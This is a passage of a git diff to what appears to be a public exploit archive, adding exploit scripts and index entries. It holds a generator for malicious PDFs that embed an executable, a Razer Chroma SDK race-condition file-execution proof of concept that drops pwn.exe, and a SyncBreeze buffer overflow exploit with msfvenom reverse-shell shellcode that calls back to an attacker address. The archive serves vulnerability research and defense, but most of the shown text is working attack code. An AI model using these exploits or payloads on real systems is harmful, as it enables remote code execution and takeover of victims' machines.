+        print("-- EXAMPLES --")
+        print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf")
+
+        exit(-1)
+
+    #Parse user args
+    EXE_PATH = sys.argv[1] 
+    PDF_PATH = sys.argv[2]
+
+    #Generate hex
+    raw_hex = path_to_machine_code(EXE_PATH)
+
+    print("[+] Machine Code:")
+    for hex_word in raw_hex:
+        print(hex_word)
+
+    ord_string = create_rop(raw_hex)
+
+    print("[+] Instructions to add:")
+    print(ord_string)
+
+    print("[+] Generating pdf...")
+
+    print("\t- Filling template...")
+    evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string)
+    
+    print("\t- Writing file...")
+    with open(PDF_PATH,'w') as fd:
+        fd.write(evil_pdf)
+
+    print("[+] Generated pdf:",PDF_PATH)
\ No newline at end of file
diff --git a/exploits/windows/remote/49106.py b/exploits/windows/remote/49106.py
new file mode 100755
index 000000000..3ee674ff3
--- /dev/null
+++ b/exploits/windows/remote/49106.py
@@ -0,0 +1,119 @@
+Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution
+Date: 2020-08-13
+Exploit Author: Loke Hui Yi
+Vendor Homepage: https://razerid.razer.com
+Software Link: http://rzr.to/synapse-3-pc-download
+Version: <= v3.12.17
+Tested on: Windows 10
+CVE: CVE-2020-16602
+
+# More info can be found here: 
+# https://www.angelystor.com/2020/09/cve-2020-16602-remote-file-execution-on.html
+# https://www.youtube.com/watch?v=fkESBVhIdIA
+
+# Remote attackers can register applications to the Chroma Server. If the attacker has write access to the ProgramData folder where the Chroma Server stores its data, he can exploit a race condition and get the server to execute a binary of his choosing.
+
+# The code below registers an application to the Chroma Server using a name of the attacker's choosing. 
+
+# The attacker will need to pre-create a folder with the same name as the application to be registered in Razer Chroma SDK\Apps\<appname>, and create an exe file with the same application's name in that folder. The Apps folder is user writable and does not require admin privileges.
+
+# The attacker can keep running the code below to get the Server to execute the file while writing  the payload to the target directory with another process (eg samba or ftp) in order to exploit the race condition.
+
+import requests
+import json
+
+
+def heartbeat(uri):
+    print(uri + '/heartbeat')
+    r = requests.put(uri + '/heartbeat', verify=False)
+    print(r.text)
+
+def keyboard(uri):
+    data = {
+        "effect":"CHROMA_CUSTOM_KEY",
+        "param":{
+            "color":[
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535]
+            ],
+            "key":[
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, (16777216 | ~255), (16777216 | ~255), (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), (16777216 | ~16776960), (16777216 | ~16776960), 0, 0, 0, 0]
+            ]
+        }
+    }
+    print(uri + '/keyboard')
+    r = requests.put(uri + '/keyboard', json=data, verify=False)
+    print(r.text)
+
+text="a"
+
+for x in range(20000):
+    text += "a"
+
+pload = {
+    "title": "APPNAME",
+    "description": "description",
+    "author": {
+        "name": "name",
+        "contact": "contact"
+    },
+    "device_supported": [
+        "keyboard",
+        "mouse",
+        "headset",
+        "mousepad",
+        "keypad",
+        "chromalink"],
+    "category": "application"
+}
+server = 'https://chromasdk.io:54236/razer/chromasdk'
+r = requests.post(server, json=pload, verify=False)
+
+json_data = json.loads(r.text)
+
+print(json_data)
+uri = json_data['uri']
+
+heartbeat(uri)
+
+#uri = 'https://chromasdk.io:54236/sid=58487'
+heartbeat(uri)
+
+keyboard(uri)
+
+
+print (json_data['sessionid'])
+
+do_heartbeat = False
+
+if do_heartbeat:
+    sid = 1
+    uri = 'https://chromasdk.io:54236/sid=' + sid
+    heartbeat(uri)
+
+# PoC loop.py for race test
+'''
+import requests
+
+def copyfile(src, dst):
+    with open(src, 'rb') as fsrc:
+        with open(dst, 'wb') as fdst:
+            content = fsrc.read()
+            fdst.write(content)
+
+while True:
+    try:
+        print("copying")
+        copyfile('pwn.exe', 'C:\\ProgramData\\Razer Chroma SDK\\Apps\\pwn\\pwn.exe')
+    except Exception as e:
+        print(str(e))
+'''
\ No newline at end of file
diff --git a/exploits/windows/webapps/49104.py b/exploits/windows/webapps/49104.py
new file mode 100755
index 000000000..68029247d
--- /dev/null
+++ b/exploits/windows/webapps/49104.py
@@ -0,0 +1,70 @@
+# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
+# Date: 18-Sep-2020
+# Exploit Author: Abdessalam king(A.salam)
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
+# Version: 10.0.28
+# Tested on: Windows 7,windows xp,windows 10
+#72413372 [*] Exact match at offset 520
+#jmp esp FFE4 \xff\xe4
+#!mona modules
+#!mona find -s "\xff\xe4" -m libspp.dll
+#address esp => 10090C83
+#badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d"
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c
+-b "\x00\x0a\x0d\x25\x26\x2b\x3d"  EXITFUNC=thread
+#!/usr/bin/python
+import socket
+
+shell =""
+shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
+shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf"
+shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9"
+shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc"
+shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0"
+shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5"
+shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5"
+shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76"
+shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b"
+shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60"
+shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1"
+shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2"
+shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1"
+shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b"
+shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3"
+shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3"
+shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5"
+shell +="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8"
+shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83"
+shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d"
+shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45"
+shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77"
+shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0"
+shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16";
+
+
+payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" *
+20 + shell +"\x90"*(1400-520-4-20-len(shell))
+req =""
+req += "POST /login HTTP/1.1\r\n"
+req += "Host: 192.168.1.20\r\n"
+req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0\r\n"
+req += "Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+req += "Accept-Language: en-US,en;q=0.5\r\n"
+req += "Accept-Encoding: gzip, deflate\r\n"
+req += "Referer: http://192.168.1.20/login\r\n"
+req += "Content-Type: application/x-www-form-urlencoded\r\n"
+req += "Content-Length: "+str(len(payload))+"\r\n"
+req += "Connection: keep-alive\r\n"
+req += "Upgrade-Insecure-Requests: 1\r\n"
+req += "\r\n"
+req += payload
+# print req
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("192.168.1.20",80))
+s.send(req)
+print s.recv(1024)
+
+s.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4fe526b8a..0d8798fae 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6761,6 +6761,8 @@ id,file,description,date,author,type,platform,port
 48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows,
 48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
+49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
+49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11204,6 +11206,11 @@ id,file,description,date,author,type,platform,port
 49086,exploits/windows/local/49086.py,"IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow",2020-11-20,"Paolo Stagno",local,windows,
 49087,exploits/windows/local/49087.rb,"Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)",2020-11-20,ZwX,local,windows,
 49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
+49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
+49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
+49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
+49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,
+49116,exploits/windows/local/49116.py,"Foxit Reader 9.0.1.1049 - Arbitrary Code Execution",2020-11-27,CrossWire,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18305,6 +18312,7 @@ id,file,description,date,author,type,platform,port
 49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple,
 49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
 49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
+49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42984,7 +42992,7 @@ id,file,description,date,author,type,platform,port
 48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php,
 48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java,
 48315,exploits/php/webapps/48315.txt,"WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php,
-48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,
+48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Aviv Beniash",webapps,php,
 48318,exploits/hardware/webapps/48318.txt,"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution",2020-04-14,Wadeek,webapps,hardware,
 48319,exploits/java/webapps/48319.txt,"WSO2 3.1.0 - Persistent Cross-Site Scripting",2020-04-14,"Raki Ben Hamouda",webapps,java,
 48320,exploits/java/webapps/48320.py,"Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution",2020-04-14,nu11secur1ty,webapps,java,
@@ -43204,7 +43212,7 @@ id,file,description,date,author,type,platform,port
 48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,
 48853,exploits/php/webapps/48853.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)",2020-10-02,bzyo,webapps,php,
 48854,exploits/php/webapps/48854.txt,"Photo Share Website 1.0 - Persistent Cross-Site Scripting",2020-10-02,Augkim,webapps,php,
-48855,exploits/multiple/webapps/48855.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-10-05,"Aviv Beniash",webapps,multiple,
+49092,exploits/hardware/webapps/49092.txt,"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass",2020-11-23,malwrforensics,webapps,hardware,
 48856,exploits/php/webapps/48856.py,"SpamTitan 7.07 - Unauthenticated Remote Code Execution",2020-10-05,"Felipe Molina",webapps,php,
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
 48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
@@ -43316,3 +43324,24 @@ id,file,description,date,author,type,platform,port
 49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,
 49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,
 49085,exploits/php/webapps/49085.txt,"WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting",2020-11-20,"Hemant Patidar",webapps,php,
+49090,exploits/php/webapps/49090.txt,"VTiger v7.0 CRM - 'To' Persistent XSS",2020-11-23,Vulnerability-Lab,webapps,php,
+49091,exploits/multiple/webapps/49091.txt,"LifeRay 7.2.1 GA2 - Stored XSS",2020-11-23,3ndG4me,webapps,multiple,
+49093,exploits/multiple/webapps/49093.txt,"nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,multiple,
+49094,exploits/multiple/webapps/49094.txt,"Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service",2020-11-24,SunCSR,webapps,multiple,
+49096,exploits/linux/webapps/49096.rb,"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)",2020-11-24,"Giuseppe Fuggiano",webapps,linux,
+49097,exploits/hardware/webapps/49097.txt,"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)",2020-11-24,maj0rmil4d,webapps,hardware,
+49098,exploits/php/webapps/49098.txt,"OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)",2020-11-24,"Hemant Patidar",webapps,php,
+49099,exploits/php/webapps/49099.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,php,
+49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php,
+49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php,
+49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,
+49107,exploits/php/webapps/49107.txt,"Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting",2020-11-27,"Ilca Lucian Florin",webapps,php,
+49109,exploits/php/webapps/49109.txt,"WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting",2020-11-27,"Sun* Cyber Security Research Team",webapps,php,
+49110,exploits/hardware/webapps/49110.py,"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution",2020-11-27,"Emre SUREN",webapps,hardware,
+49112,exploits/php/webapps/49112.py,"Laravel Administrator 4 - Unrestricted File Upload (Authenticated)",2020-11-27,"Xavi Beltran",webapps,php,
+49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,
+49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php,
+49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,
+49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
+49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
+49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,